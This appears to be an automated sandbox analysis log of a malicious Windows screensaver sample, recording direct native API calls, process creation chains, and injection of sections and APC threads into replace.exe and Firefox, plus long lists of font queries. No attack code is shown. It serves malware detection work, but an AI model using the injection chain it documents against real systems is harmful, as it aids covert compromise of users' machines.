                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtCreateFile: Direct from: 0x76F02FEC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtOpenFile: Direct from: 0x76F02DCC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtQueryInformationToken: Direct from: 0x76F02CAC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtTerminateThread: Direct from: 0x76F02FCC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtOpenKeyEx: Direct from: 0x76F02B9C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtSetInformationProcess: Direct from: 0x76F02C5C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtCreateMutant: Direct from: 0x76F035CC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtMapViewOfSection: Direct from: 0x76F02D1C
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtResumeThread: Direct from: 0x76F036AC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtReadFile: Direct from: 0x76F02ADC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtDelayExecution: Direct from: 0x76F02DDC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtQueryInformationProcess: Direct from: 0x76F02C26
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtResumeThread: Direct from: 0x76F02FBC
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe NtCreateUserProcess: Direct from: 0x76F0371C
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Section loaded: NULL target: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe protection: execute and read and write
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Section loaded: NULL target: C:\Windows\SysWOW64\replace.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe protection: read write
                  Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
                  Source: C:\Windows\SysWOW64\replace.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
                  Source: C:\Windows\SysWOW64\replace.exe Thread register set: target process: 8184
                  Source: C:\Windows\SysWOW64\replace.exe Thread APC queued: target process: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Process created: C:\Users\user\Desktop\MR-239-1599-A.scr.exe "C:\Users\user\Desktop\MR-239-1599-A.scr.exe"
                  Source: C:\Program Files (x86)\ZSEZEOIRaEGcNTbypkRykbCSrfKSoUaZhKhKinOATervHyZCBLXrUflUUMoOPVwtq\DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe Process created: C:\Windows\SysWOW64\replace.exe "C:\Windows\SysWOW64\replace.exe"
                  Source: C:\Windows\SysWOW64\replace.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
                  Source: DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000002.4092706641.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000005.00000000.1858089820.0000000000C40000.00000002.00000001.00040000.00000000.sdmp, DfdOmQvPqYXHyvsLVgDsvnqUHhsrOM.exe, 00000009.00000000.2033212614.0000000000F40000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Users\user\Desktop\MR-239-1599-A.scr.exe VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
                  Source: C:\Users\user\Desktop\MR-239-1599-A.scr.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
